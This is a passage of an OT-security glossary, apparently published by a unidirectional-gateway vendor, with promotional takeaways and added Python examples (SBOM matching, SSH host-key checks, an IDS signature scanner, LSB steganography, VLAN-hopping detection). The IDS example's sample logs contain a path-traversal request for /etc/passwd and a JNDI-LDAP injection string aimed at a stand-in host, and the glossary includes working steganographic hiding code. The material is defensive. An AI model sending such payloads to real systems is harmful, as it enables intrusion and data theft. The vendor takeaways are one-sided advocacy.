Relevancy to Unidirectional Gateways: As signals are of critical importance from a safety perspective, the guidance states that signaling systems on rail networks should contain unidirectional gateways. Train control and signaling – networks for passengers should be physically or electronically separate from networks used for train control and signaling (especially where WiFi is used).
Waterfall Takeaway: The attack surface of rail networks is rather large, spanning control, signaling, IT and passenger networks. The DfT understands the threat cyber attacks pose to public safety and recommends the strongest technology for its signaling systems: unidirectional gateways.
Source : gov.uk
Removable Media
Any portable digital storage medium. For example: CD-ROMs, DVDs, USB drives, floppy disks, and almost all cell phones.
Residual Risk
Any risk an organization chooses to accept, rather than mitigate or transfer. The residual risk to which an organization is exposed is a measure of how secure that organization is.
RIIA (Guidance, UK)
What is it: This report finds that the trend toward connecting business systems with nuclear facilities introduces a host of cyber vulnerabilities to nuclear facilities that nuclear plant personnel may not be aware of. This report focuses on cyber attacks that seek to take over nuclear industrial control systems, acting either inside or outside of the facilities where these systems are located. The authors of the report believe that many of the findings and guidelines also apply to wider critical infrastructure, including power grids, transport networks, and maritime shipping. The report emphasizes the necessity of unidirectional communication technology at nuclear facilities, both for protecting the network perimeter from the IT network and for vendor VPN remote access. The report notes a number of specific recommendations to address the challenges identified in the study. To address the challenge of enhancing security, given insufficient spending on cyber security within the nuclear industry, the authors encourage further adoption of secure unidirectional communications technology.
Relevancy to Unidirectional Gateways: The report states that it would be fairly straightforward for a hacker to break through a firewall and gain access to the ICS network, whereas with unidirectional communication technology installed the network cannot be breached over that connection. For protecting the ICS network the results of the study are clear: firewalls aren’t good enough, because they are reactive rather than anticipatory, attacks can go undetected, and attacks are detected only when they are already inside the network. The report highlights seven known cyber security incidents at nuclear facilities around the world which could have been prevented with Unidirectional Security Gateways.
Waterfall Takeaway: Nuclear facilities in the UK are becoming increasingly reliant on digitization and commercial software. This recent trend has presented a growing attack surface area for nuclear plants. The UK and Europe are beginning to catch on to the trend toward unidirectional communication technology to protect the national critical infrastructure which could cause the most widespread damage if breached. The case is made strong in this report, unidirectional gateways are the way to go.
Root
Root is the highest permission elevation on a computer system. Root is also known as the Root User or a Super User. Root permission is typically reserved for those who are authorized to make operating system level changes.
Router
A networking device that forwards data packets between computer networks.
RSA (cryptosystem)
RSA (Rivest–Shamir–Adleman) is a public-key cryptosystem, one of the oldest widely used for secure data transmission.
RSV
RSV (Rows of String Values) is a simple binary alternative to CSV: rows of string values separated by reserved byte values that cannot occur in valid UTF-8, so values need no quoting or escaping and parsing is unambiguous. The format specification describes the data structure and defines the encoding used.
RTU
RTU stands for Remote Terminal Unit, an electronic device that connects physical devices to a larger control system: RTUs act as a link between the physical world and a supervisory control and data acquisition (SCADA) system. They collect data from field devices, such as sensors, valves, and actuators, and send it to the SCADA system. The SCADA system then sends commands back to the RTU to control the connected devices.
S4 (Conference)
The S4 conference is a technical event that focuses on the future of Industrial Control Systems (ICS) and Operational Technology (OT) cybersecurity. The conference is for practitioners, asset owners, operators, and suppliers in these fields.
S7
In an OT context, S7 refers to the Siemens SIMATIC S7 family of PLCs (S7-300, S7-400, S7-1200, S7-1500) and to the S7comm protocol that the Step 7/TIA Portal engineering tools and HMIs use to program and monitor them, carried over ISO-on-TCP on TCP port 102. Stuxnet targeted S7-300 and S7-400 controllers. (Unrelated: S7 is also the name of an object-oriented programming system for R, combining features of S3 and S4, developed by the R Consortium Working Group on OOP.)
Sabotage (Cyber Sabotage)
Cyber sabotage is a deliberate act that aims to disrupt, destroy, or impair networks and information systems. The goal is to cause chaos or inflict damage, often by exploiting vulnerabilities in digital infrastructure. Cyber sabotage can target organizations, governments, or nation-states, and can range from defacing websites to disabling critical infrastructure.
Safety Instrumented System (SIS)
An industrial device or cooperating set of devices monitoring sensors in an industrial process, and triggering automatic actions to bring the system back into a safe state when sensors or combinations of sensors ever exceed designated limits. The safe state is most commonly a complete shutdown of the industrial process. SIS equipment is designed to protect human life and environmental integrity.
Safety Program
A set of policies, procedures and technologies designed to protect human life and environmental integrity.
Sandbox
A virtual machine in which complex files are opened by their respective applications. The virtual clock on the machine is advanced, and other measures are taken to try to stimulate the activity of any embedded malware. The virtual machine is then monitored to try to detect the operation of malware. For example, does the machine send messages to the Internet, or create unexpected files anywhere in the filesystem? Limitations: Malware authors have started producing sandbox-aware malware that detects that it is operating in a sandbox and carries out none of the usual suspicious activities when a sandbox is detected. Malware authors have also demonstrated the ability to exploit vulnerabilities in the sandbox mechanism to escape from the sandbox and infect the computer running the sandbox.
SBOM
A Software Bill of Materials (SBOM) is a detailed list of the components and modules that make up a piece of software, including: The components and their supply chain relationships, The licenses that govern the components, The versions of the components, and The patch status of the components. SBOMs are created by software developers and vendors to ensure transparency and traceability of code components, facilitate supply chain security, ensure compliance with regulations, and improve cybersecurity.
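As an added example (not from the original glossary and not the code of any SBOM tool), the following Python reads a constructed CycloneDX JSON SBOM and matches its components against a small advisory list keyed by package URL (purl). The application name, the SBOM contents and the advisory list are made up for illustration; the one CVE shown is the real one for log4j-core, and the version ordering is a simplified comparison, not full semver.

```python
"""Match the components in a CycloneDX SBOM against an advisory list (illustrative)."""
import json
import re

# Constructed sample SBOM: a fictional historian collector and three of its libraries.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "metadata": {"component": {"type": "application",
                               "name": "historian-collector", "version": "3.2.0"}},
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
         "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
        {"type": "library", "name": "requests", "version": "2.31.0",
         "purl": "pkg:pypi/requests@2.31.0"},
        {"type": "library", "name": "openssl", "version": "1.1.1k"},  # no purl supplied
    ],
})

# Constructed advisory feed: purl without version, plus the first fixed version.
ADVISORIES = [
    {"id": "CVE-2021-44228", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core",
     "fixed_in": "2.15.0"},
]


def version_key(version):
    """Order versions by numeric and alphabetic runs, e.g. '1.1.1k' -> 1,1,1,'k'.
    Numbers sort before letters; this is not full semver, just enough for the demo."""
    runs = re.findall(r"\d+|[A-Za-z]+", version)
    return tuple((0, int(r)) if r.isdigit() else (1, r) for r in runs)


def parse_sbom(text):
    """Return a list of (purl_base, version, name) for every component in the SBOM.
    Components without a purl get a pkg:generic purl built from their name."""
    doc = json.loads(text)
    if doc.get("bomFormat") != "CycloneDX":
        raise ValueError("not a CycloneDX document")
    components = []
    for comp in doc.get("components", []):
        version = comp.get("version", "")
        purl = comp.get("purl") or "pkg:generic/%s@%s" % (comp["name"], version)
        components.append((purl.split("@", 1)[0], version, comp["name"]))
    return components


def find_affected(components, advisories=ADVISORIES):
    """Return [(name, version, advisory id)] for components below the fixed version."""
    hits = []
    for purl_base, version, name in components:
        for adv in advisories:
            if purl_base == adv["purl"] and version_key(version) < version_key(adv["fixed_in"]):
                hits.append((name, version, adv["id"]))
    return hits


if __name__ == "__main__":
    for name, version, adv_id in find_affected(parse_sbom(SAMPLE_SBOM)):
        print("%s %s is affected by %s" % (name, version, adv_id))
```

The openssl entry shows why an SBOM without purls is of limited use: a match on bare name and version is fragile across ecosystems, whereas a purl identifies the exact package in its registry.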
SCADA
SCADA is an acronym for Supervisory Control and Data Acquisition: a computer system that monitors and controls industrial processes and equipment in real time. SCADA systems are used in many industries, including transportation, oil and gas, energy, waste control, water, and telecommunications.
SCP
Secure Copy Protocol: a network protocol for transferring files between hosts, carried over Secure Shell (SSH), which provides the authentication and encryption. The scp wire protocol itself is considered legacy: OpenSSH has deprecated it in favour of SFTP and, since OpenSSH 9.0, the scp command uses SFTP as its transport by default.
SDN (Software-Defined Network)
Software-Defined Networking (SDN) is a network architecture that uses software to control and manage networks; see Software-defined Networks below.
Secure Remote Access
What they are: Secure Remote Access (SRA) systems are collections of software and hardware that allow people to operate sensitive OT computers remotely. SRA systems almost always include VPNs, two-factor authentication, and remote access software such as the ubiquitous Windows Remote Desktop.
Where to use: Remote access into critical systems is strongly discouraged by most experts and in fact illegal in some jurisdictions. Remote access systems are used routinely inside industrial networks, all at the same level of criticality, to permit users on the one side of a large plant to manipulate automation equipment on the other side, or equipment that is in locations that are dangerous to physically walk into.
Intrinsic Limitations: All remote access systems are software, with vulnerabilities discovered and undiscovered. A phished password is often all an attacker needs to impersonate a legitimate user in the remote access system. Two-factor authentication systems for remote access are the subject of active exploitation by nation-state threat actors.
Secure Shell (SSH)
An application (and protocol) that issues commands to a remote machine and receives their responses over an encrypted, authenticated network connection. Limitations: Ssh is software and has vulnerabilities. The simplest way to subvert ssh is a “man in the middle” attack. Ssh can diagnose such an attack only when the client already holds the server’s host key (in known_hosts, or via a host certificate authority); on first contact it merely asks the user to accept an unknown key, and even when a mismatch is reported, most users ignore the “you may be under attack” warning and continue using the tool. Another way to subvert ssh is to compromise an authorized remote ssh endpoint or laptop, and with it the private keys or agent sessions held there.
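To make the host-key point concrete, here is an added Python example (not from the original glossary and not OpenSSH code) that mimics the known_hosts lookup an ssh client performs, including the hashed-hostname form OpenSSH writes when HashKnownHosts is on. The host names, addresses and keys are constructed; the key blobs are length-prefixed byte strings in SSH wire format, not real Ed25519 keys.

```python
"""Mimic the OpenSSH known_hosts check to show when a host-key mismatch is detectable."""
import base64
import hashlib
import hmac
import struct


def _blob(key_type, raw):
    """Base64 SSH public-key blob: length-prefixed type string and raw key bytes (constructed)."""
    wire = struct.pack(">I", len(key_type)) + key_type + struct.pack(">I", len(raw)) + raw
    return base64.b64encode(wire).decode()


def fingerprint(key_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def hashed_host_entry(host, salt=b"\x01" * 20):
    """known_hosts host field in HashKnownHosts form: |1|<salt>|<HMAC-SHA1(salt, host)>."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def _host_matches(pattern, host):
    """Match a host field that is either comma-separated names or a hashed entry."""
    if pattern.startswith("|1|"):
        _, _, salt_b64, mac_b64 = pattern.split("|", 3)
        mac = hmac.new(base64.b64decode(salt_b64), host.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(mac, base64.b64decode(mac_b64))
    return host in pattern.split(",")


def check_host_key(known_hosts, host, key_type, key_b64):
    """'OK' if the pinned key matches, 'MISMATCH' if a pinned key differs (possible
    man-in-the-middle), 'UNKNOWN' if nothing is pinned (first contact: nothing to compare)."""
    pinned = False
    for line in known_hosts.splitlines():
        fields = line.split()
        if len(fields) < 3 or line.startswith("#") or line.startswith("@"):
            continue  # blank, comment, or @cert-authority/@revoked markers (not handled here)
        pattern, ktype, kdata = fields[0], fields[1], fields[2]
        if ktype != key_type or not _host_matches(pattern, host):
            continue
        pinned = True
        if hmac.compare_digest(kdata, key_b64):
            return "OK"
    return "MISMATCH" if pinned else "UNKNOWN"


# Constructed keys and known_hosts contents (no real hosts or keys).
GOOD_KEY = _blob(b"ssh-ed25519", bytes(range(32)))
ATTACKER_KEY = _blob(b"ssh-ed25519", bytes(range(32, 64)))
KNOWN_HOSTS = "\n".join([
    "# pinned on first contact, or better, distributed with the engineering workstation image",
    "scada-hmi.plant.local,10.0.5.20 ssh-ed25519 " + GOOD_KEY,
    hashed_host_entry("historian.plant.local") + " ssh-ed25519 " + GOOD_KEY,
])

if __name__ == "__main__":
    print("pinned:", fingerprint(GOOD_KEY))
    print(check_host_key(KNOWN_HOSTS, "10.0.5.20", "ssh-ed25519", ATTACKER_KEY))
    print(check_host_key(KNOWN_HOSTS, "eng-laptop.plant.local", "ssh-ed25519", ATTACKER_KEY))
```

The UNKNOWN result is the trust-on-first-use gap described above: an attacker who intercepts the first connection is never contradicted. Pre-populating known_hosts (or issuing host certificates and pinning the CA with an @cert-authority line) and setting StrictHostKeyChecking to yes turns both the UNKNOWN and the MISMATCH cases into hard failures instead of prompts.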
Security of Critical Infrastructure Act 2018 (SOCI Act 2018) (Act)
What is it: Protects essential services including manufacturing in Australia.
Relevancy to Unidirectional Gateways: Directly relevant as it defines obligations for protecting critical infrastructure, where unidirectional gateways are essential.
Secure Remote Access
A combination of security strategies that allow users to operate technology remotely while protecting the security of networks and data such as Waterfall’s HERA (Hardware Enforced Remote Access)
Security Risk Assessment
An evaluation of potential threats to a security system and the development of countermeasures. It helps decision-makers make informed decisions about the effectiveness of the security system.
Security Updates / Patches
What they are: Security updates are new versions of software that are supposed to correct exploitable software defects (software vulnerabilities).
Where to use: Many experts recommend that security updates be applied universally, to all industrial systems as quickly as practical. This is practical on non-critical networks but can be extremely expensive on the most critical networks, because of the engineering effort involved in investigating and validating a new version of software on safety-critical or reliability-critical networks.
Intrinsic Limitations: Some security updates are defective, and either do not repair the vulnerability they are intended to or introduce new and sometimes even more serious vulnerabilities than the one they nominally fix. Security updates correct known defects in software – they do nothing to correct unknown “zero-day” defects, poorly chosen or leaked passwords, poorly configured security systems or firewalls, or insiders misusing their credentials.
Semiconductor
A solid material whose electrical conductivity lies between that of an insulator and that of most metals, and which can be made to conduct or block current depending on conditions such as applied voltage or doping; the basis of transistors and integrated circuits.
Setpoint
In cybernetics and control theory, a setpoint is the desired or target value for an essential variable, or process value (PV) of a control system, which may differ from the actual measured value of the variable. Departure of such a variable from its setpoint is one basis for error-controlled regulation using negative feedback for automatic control. A setpoint can be any physical quantity or parameter that a control system seeks to regulate, such as temperature, pressure, flow rate, position, speed, or any other measurable attribute.
SESAR - Addressing Airport Cybersecurity (EU Study)
What is it: The study’s objectives are to:
- Identify potential weaknesses in SESAR APOC / TAM;
- Investigate accreditation and assurance for building trust;
- Investigate and assess information sharing and threat mechanisms;
- Investigate common cyber-situational awareness and collaborative decision making.
The focus of the study is the SESAR APOC concept – i.e. the APOC of the future, rather than today’s preliminary APOCs. However, the study is informed by the practical considerations of the concept at Groupe ADP, thereby providing a real-life insight into how the concept will develop. The study was completed between June and October 2016.
Relevancy to Unidirectional Gateways: Data Diodes are promoted to make certain data sources read-only, “such as relating to passengers”.
“Since more and more services are interconnected, security systems are fully deployed, such as Intrusion Detection System (IDS), Intrusion Prevention System (IPS), segregation/zoning and access control. A security architecture would offer depth and resilience. Since some AOP data sources can be read-only, then data diodes4 can be used. Audit and penetration tests are performed regularly.”
“A data diode is a network device that allows data to travel only in one direction.”
“However, due to the high number of APOC interfaces, one important application of the separation principle is to look at which data feeds are ‘read only’ (as opposed to ‘read and write’) and to use data diodes to isolate and protect these feeds.”
Waterfall Takeaway: The cyber section of this study talks about SESAR, the technological arm of the Single European Sky initiative, which delivers new operational concepts, procedures and systems to support the SES objectives. The document is strong in that it emphasizes PREVENTION of compromise, and acknowledges that cyber space includes physical as well as virtual elements.
Recommending data diodes for read-only data is a start, but it demonstrates a limited view of the usefulness of unidirectional technology for airport operations.
Source: SESAR (PDF)
Shutdown
A plant shutdown is a temporary halt in production at an industrial facility to perform maintenance, repairs, or upgrades. Shutdowns are also known as turnarounds or outages. Plant shutdowns are planned in advance to minimize production interruptions and ensure the plant operates safely and efficiently. They can last from a few hours to several weeks, depending on the work required.
SIEM
SIEM stands for Security Information and Event Management, and it’s a security management system that combines security information management (SIM) and security event management (SEM): SIEM helps organizations detect, analyze, and respond to security threats. It collects event log data from various sources, identifies abnormal activity, and takes action.
Signature-based Intrusion-Detection System
An intrusion-detection system with rules called “signatures” that identify suspicious behaviors for a computer, network or other system. The system raises alerts when the behavior of the system matches a rule. Limitations: Most intrusion-detection systems are software, and contain vulnerabilities that may be exploited. In addition, signatures are generally updated in signature-based systems only when new types of attacks come into widespread use. One common way to defeat signature-based intrusion-detection system is to steal credentials and log in remotely, rather than use traditional “attack” tools that match signatures. Another is to write new attack code or malware that does not match any existing signature.
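Added example (not from the original page or any IDS product): a few signature rules, expressed as regular expressions in the spirit of content-match IDS rules, run over constructed log lines. It shows a signature firing on a known payload, the same payload slipping past when percent-encoded unless the engine normalizes input first, and a login with a stolen password producing no match at all. The rule names, addresses and log lines are all made up.

```python
"""Run a small signature set over constructed log lines to show what signatures do and do not see."""
import re
from urllib.parse import unquote

# Constructed signature set: each rule is a name and a pattern for a known attack string.
SIGNATURES = [
    ("SIG-001 directory traversal", re.compile(r"\.\./\.\./")),
    ("SIG-002 JNDI lookup injection", re.compile(r"\$\{jndi:", re.IGNORECASE)),
    ("SIG-003 sqlmap user agent", re.compile(r"\bsqlmap\b", re.IGNORECASE)),
]

# Constructed events (web server access log lines and one sshd line), not captured traffic.
SAMPLE_EVENTS = [
    '10.0.9.4 - - [03/Mar/2024:10:15:02 +0000] "GET /cgi-bin/../../etc/passwd HTTP/1.1" 404 0',
    '10.0.9.4 - - [03/Mar/2024:10:15:09 +0000] "GET /login?u=${jndi:ldap://10.0.9.4/a} HTTP/1.1" 200 0',
    '10.0.9.4 - - [03/Mar/2024:10:15:41 +0000] "GET /cgi-bin/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
    'sshd[2210]: Accepted password for engineer from 10.0.9.4 port 51022 ssh2',
]


def match_signatures(event, signatures=SIGNATURES, normalize=False):
    """Return the names of the signatures whose pattern occurs in the event.
    With normalize=True, percent-encoding is decoded before matching (what a
    protocol-aware IDS does); without it, encoded variants of a payload are missed."""
    text = unquote(event) if normalize else event
    return [name for name, pattern in signatures if pattern.search(text)]


def scan(events, signatures=SIGNATURES, normalize=False):
    """Map event index -> list of matching signature names, for events that matched."""
    alerts = {}
    for index, event in enumerate(events):
        hits = match_signatures(event, signatures, normalize)
        if hits:
            alerts[index] = hits
    return alerts


if __name__ == "__main__":
    print("raw:       ", scan(SAMPLE_EVENTS))
    print("normalized:", scan(SAMPLE_EVENTS, normalize=True))
```

The fourth event never matches anything: a successful login with a phished password is, by construction, indistinguishable from a legitimate one at the signature level, which is why credential-based intrusions are caught (if at all) by behavioural baselines, source-address policy or unidirectional architecture rather than by signatures.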
Singapore’s Cybersecurity Act’s Codes of Practice (CCoP 2.0) (Standard)
What is it: Cybersecurity standard for Critical Information Infrastructure (CII) owners in Singapore.
Relevancy to Unidirectional Gateways: Directly relevant as it governs cybersecurity for critical information infrastructure, likely including unidirectional gateways.
Source: CSA (PDF)
Snake
Snake was malware developed by the Federal Security Service of Russia. It was one of the most used tools by FSB’s Center 16 and formed a part of the Turla toolset. It saw use in at least 50 countries, being employed to collect data from government networks, diplomatic communication and research facilities.
Sneakernet
Carrying computers, USB drives and other machine readable information past physical security boundaries into SCADA systems.
SNMP
Simple Network Management Protocol (SNMP) is a networking protocol that allows users to monitor and manage network devices connected over an IP network. SNMP is part of the Transmission Control Protocol/Internet Protocol (TCP/IP) family.
SOAP
Simple Object Access Protocol (SOAP) is a lightweight XML-based protocol that is used for the exchange of information in decentralized, distributed application environments. You can transmit SOAP messages in any way that the applications require, as long as both the client and the server use the same method.
SOC
Security Operations Center: A center that monitors and responds to threats to an organization’s systems and data. SOCs can help organizations detect and respond to threats quickly, reducing the potential for data loss or downtime. They can also help organizations comply with data privacy regulations.
Software
Software is a set of written instructions that can be stored and run by hardware. Hardware derived its name from the fact it is hard or rigid with respect to changes, whereas software is soft because it is easy to change.
Software-defined Networks
What they are: Software-defined networks (SDN) are network components such as firewalls, switches, routers plus management software. The software can reconfigure the network components to meet changing network and cybersecurity needs. For example, if a SOC declares a major compromise of the IT network, OT SDNs might reconfigure IT/OT firewalls to start blocking 100% of traffic, permitting nothing through until the emergency condition clears. Another example: a natural gas pipeline SCADA center might communicate with compressor stations across the pipeline’s own fibre normally, but if the fibre is severed in a construction mistake, the SDN causes that communications to fail over transparently to satellite feeds, or VPNs through the Internet, or low-speed modems running through leased telephone lines.
Where to use: SDNs are used more commonly for high-availability communications than for security in industrial contexts. SDNs are occasionally connected to network IPS systems – when the IPS needs to interrupt a communications session carrying an attack in progress, the IPS interacts with the SDN software to block the session.
Intrinsic Limitations: All SDNs are software, with vulnerabilities already discovered and undiscovered. All SDNs control communications equipment and are blind to attacks carried on USB thumb drives or laptop computers.
SPAN Port (Mirror Port)
A SPAN (Switched Port Analyzer) port, also known as a mirror port, is a software feature on a switch or router that copies selected packets passing through the device and sends them to a specific destination port, typically one connected to an intrusion detection or OT network monitoring sensor. The copy is one way: a sensor on a mirror port sees the traffic but cannot inject anything into the monitored links, which is why it is the usual attachment point for passive OT monitoring. A mirror port drops packets when the traffic it is asked to copy exceeds its own bandwidth, so a hardware network tap is preferred where complete capture matters.
Spear-phishing
Phishing email designed with a particular individual in mind, generally reflecting information found on social media and other Internet sites.
SQL
Structured Query Language (SQL) is a domain-specific language used to manage data, especially in a relational database management system (RDBMS). It is particularly useful in handling structured data, i.e., data incorporating relations among entities and variables.
SRA
Security Risk Assessment
An evaluation of potential threats to a security system and the development of countermeasures. It helps decision-makers make informed decisions about the effectiveness of the security system.
Steganography
The study of hiding information in plain sight – for example, encoding an information stream in the low-order bits of pixel values in an image, thus changing the image to store information in ways that are imperceptible to a human eye.
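The low-order-bit technique described above, as an added worked example that is not part of the glossary: the payload is written into the least significant bit of successive pixel values, prefixed with a 4-byte length so the reader knows where to stop. The “image” is a constructed byte array of 8-bit greyscale pixels rather than a real file; the length header and bit order are assumptions made for the example.

```python
# Added example: LSB steganography over a constructed greyscale pixel array.
# Each pixel is one byte; only its lowest bit is touched, so no pixel changes by more than 1.

def embed_lsb(pixels: bytes, payload: bytes) -> bytearray:
    """Return a copy of pixels carrying payload (length-prefixed) in the low-order bits."""
    framed = len(payload).to_bytes(4, "big") + payload   # 4-byte big-endian length header
    needed = len(framed) * 8                             # one pixel per payload bit
    if needed > len(pixels):
        raise ValueError(f"cover too small: need {needed} pixels, have {len(pixels)}")
    out = bytearray(pixels)
    i = 0
    for byte in framed:
        for bit in range(7, -1, -1):                     # most significant bit first
            out[i] = (out[i] & 0xFE) | ((byte >> bit) & 1)
            i += 1
    return out

def extract_lsb(pixels: bytes) -> bytes:
    """Recover a payload written by embed_lsb; rejects a length header the image cannot hold."""
    def read_bytes(start_pixel: int, count: int) -> bytes:
        vals = bytearray()
        for k in range(count):
            b = 0
            for j in range(8):
                b = (b << 1) | (pixels[start_pixel + k * 8 + j] & 1)
            vals.append(b)
        return bytes(vals)
    length = int.from_bytes(read_bytes(0, 4), "big")
    if 32 + length * 8 > len(pixels):
        raise ValueError("length header exceeds image size; not an LSB payload or corrupted")
    return read_bytes(32, length)

def max_pixel_change(a: bytes, b: bytes) -> int:
    """Largest per-pixel difference between cover and stego image."""
    return max(abs(x - y) for x, y in zip(a, b))

if __name__ == "__main__":
    cover = bytes(range(256)) * 4                        # constructed 1024-pixel cover
    secret = b"PT101 setpoint 42"
    stego = embed_lsb(cover, secret)
    print(extract_lsb(stego), "max change:", max_pixel_change(cover, stego))
```

The same idea carries over to any sampled data (audio, sensor telemetry) with spare low-order precision. Note that LSB embedding is imperceptible to the eye but not to statistics: the low-order bit plane of a natural image is not uniformly random, so straightforward chi-square or histogram tests detect it, which is why exfiltration monitoring looks at bit-plane statistics rather than at the picture.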
Stuxnet
Stuxnet is a malicious computer worm first uncovered in 2010 and thought to have been in development since at least 2005. Stuxnet targets supervisory control and data acquisition (SCADA) systems and is believed to be responsible for causing substantial damage to the nuclear program of Iran. Although neither country has openly admitted responsibility, multiple independent news organizations recognize Stuxnet to be a cyberweapon built jointly by the United States and Israel in a collaborative effort known as Operation Olympic Games. The program, started during the Bush administration, was rapidly expanded within the first months of Barack Obama’s presidency.
Switch
In networking, a device that connects hosts on a local area network and forwards Ethernet frames between its ports based on the destination MAC address; managed switches add configuration such as VLANs and mirror ports. In electrical engineering the term also means a device for making and breaking the connection in an electric circuit; in OT security discussions the network meaning is usually intended.
Security PHA review
A Security PHA Review (SPR) is a study that supplements the process hazard analysis (PHA) methods commonly used in process industry plants, such as HAZOP and LOPA, with a review of whether any cyberattack vector could defeat the safeguards the PHA relies on and cause significant physical damage to the facility.
TSA Pipeline Security Directive (Directive, USA)
Summary: Enhances security of pipeline infrastructure
Relevancy to Unidirectional Gateways: May be relevant as it includes cybersecurity measures for pipeline systems that could involve unidirectional gateways.
Source: TSA Security Directive (PDF)
Unidirectional Gateways
What they are: The US NIST glossary defines unidirectional gateways as a combination of hardware and software: the hardware is physically able to send information in only one direction, and the software makes copies of servers and emulates devices. Unidirectional Gateways are used routinely to send information from industrial networks out to business automation in IT networks, with no chance that cyber attacks can penetrate from the IT network into sensitive OT / industrial networks. Unidirectional gateways routinely replicate process historians, OPC servers and other industrial devices to IT networks, where IT users and applications access the replicas normally. Since unidirectional gateway vendors serve civilian rather than military markets, sales volumes are often higher than for data diode vendors, and thus gateway providers can often afford to invest in modern user interfaces, redundancy options and other features expected of industrial-grade equipment.
Where to use: The right place to use unidirectional gateways is at a consequence boundary – between an industrial network whose worst-case safety or reliability consequences of compromise are unacceptable, and a business network whose worst-case consequences include acceptable business losses and reputational damage. Unidirectional gateways can also be used to send information into classified military and government networks when the government in question recognizes the gateway supplier as sufficiently trustworthy to permit their equipment to connect to classified networks.
Intrinsic Limitations: Unidirectional gateways control the flow of network packets – they do nothing about potentially contaminated USB drives, or laptops, or cell phones being carried into OT networks. Unidirectional gateway software – like any software – has vulnerabilities that can be exploited. However, even if such vulnerabilities are exploited, the unidirectional hardware is still physically incapable of propagating any attack back into the protected OT network.
Virtual Local Area Networks
What they are: Virtual Local Area Networks (VLANs) are a feature of managed switches. A managed switch can be configured so that groups of its ports behave as if they were separate switches, “virtual” LANs, with frames from one group not forwarded to another. This can save a little money and makes LAN configurations more flexible: when a machine needs to be moved from one LAN to another, only the switch needs to be reconfigured and no cables need to be moved.
Where to use: VLANs are recommended only when all virtual networks on the switch are at the same level of criticality. VLANs are not recommended to separate networks at different levels of criticality – for example, it is not recommended to host a gasoline pipeline’s IT network and SCADA network in separate VLANs on the same switch.
Intrinsic Limitations: VLANs are software, with vulnerabilities discovered and undiscovered. Stolen switch passwords can reconfigure switches and VLANs very quickly, putting control system components at risk. VLAN separation can also be defeated without a password through misconfiguration: a port left able to negotiate a trunk, or a native VLAN shared with an access VLAN, lets an attacker craft 802.1Q-tagged frames (“VLAN hopping”, classically by double tagging) that the switch forwards into a VLAN the port was never assigned to.
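What a sensor on a mirror port would look for to catch the hopping attempts described above, as an added example that is not part of the glossary: a small 802.1Q tag parser that walks the tag stack of an Ethernet frame and flags frames carrying two tags, or a tag for a VLAN other than the one the access port is assigned to. The frames are constructed inline; the access-port VLAN numbers and the findings wording are assumptions for the example.

```python
# Added example: detect VLAN-hopping indicators by parsing 802.1Q tag stacks.
import struct

VLAN_TAG_ETHERTYPES = {0x8100: "802.1Q", 0x88A8: "802.1ad"}

def build_frame(dst: bytes, src: bytes, vids, ethertype: int, payload: bytes) -> bytes:
    """Constructed Ethernet II frame with zero or more 802.1Q tags (outermost first)."""
    tags = b"".join(struct.pack("!HH", 0x8100, vid & 0x0FFF) for vid in vids)
    return dst + src + tags + struct.pack("!H", ethertype) + payload

def parse_vlan_tags(frame: bytes):
    """Return (vids outer-to-inner, inner ethertype, payload) for an Ethernet II frame."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    offset, vids = 12, []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated frame inside tag stack")
        (ethertype,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        if ethertype not in VLAN_TAG_ETHERTYPES:
            return vids, ethertype, frame[offset:]
        if offset + 2 > len(frame):
            raise ValueError("truncated 802.1Q tag")
        (tci,) = struct.unpack_from("!H", frame, offset)   # PCP(3) DEI(1) VID(12)
        offset += 2
        vids.append(tci & 0x0FFF)

def check_access_port_frame(frame: bytes, access_vid: int):
    """Return a finding string, or None, for a frame seen arriving on an access port."""
    vids, _, _ = parse_vlan_tags(frame)
    if len(vids) >= 2:
        return (f"double-tagged frame (outer VLAN {vids[0]}, inner VLAN {vids[1]}): "
                "classic double-tagging hop attempt")
    if len(vids) == 1 and vids[0] != access_vid:
        return f"tagged frame for VLAN {vids[0]} on an access port assigned to VLAN {access_vid}"
    return None

# Constructed sample frames: an IT workstation port on VLAN 10, SCADA on VLAN 20.
DST, SRC = b"\xff" * 6, bytes.fromhex("001122334455")
UNTAGGED_ARP = build_frame(DST, SRC, [], 0x0806, b"\x00" * 28)
TAGGED_OWN_VLAN = build_frame(DST, SRC, [10], 0x0800, b"\x45" + b"\x00" * 19)
TAGGED_SCADA_VLAN = build_frame(DST, SRC, [20], 0x0800, b"\x45" + b"\x00" * 19)
DOUBLE_TAGGED = build_frame(DST, SRC, [10, 20], 0x0800, b"\x45" + b"\x00" * 19)

if __name__ == "__main__":
    for name, f in [("arp", UNTAGGED_ARP), ("own", TAGGED_OWN_VLAN),
                    ("scada", TAGGED_SCADA_VLAN), ("double", DOUBLE_TAGGED)]:
        print(name, check_access_port_frame(f, access_vid=10))
```

A correctly configured access port should discard tagged frames and never negotiate a trunk, so even one such finding means the switch configuration, not just the sender, needs to be checked.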
Virtual Private Networks
What they are: Virtual private networks (VPNs) encrypt and authenticate communications as they pass through an untrusted network, such as the Internet. VPNs provide the illusion of a direct connection between hosts, networks, or a host and a network, a “virtual” direct connection, when a dedicated physical link is not available. Modern VPN software often includes the ability to check the integrity of laptops and other endpoints when connecting to sensitive networks. Integrity checks often include: Is AV installed and up to date? Are all security updates installed? Is the laptop still otherwise configured in a way that is consistent with corporate security policy for the laptop? The VPN tends to permit a device to connect to a sensitive network only if all these checks pass. VPNs may also be built into firewalls as a feature.
Where to use: VPNs are used routinely to connect distant industrial stations, such as compressor stations, pumping stations, and electrical substations, into central SCADA systems. VPNs are used routinely as one of the security measures that is part of “secure remote access” systems.
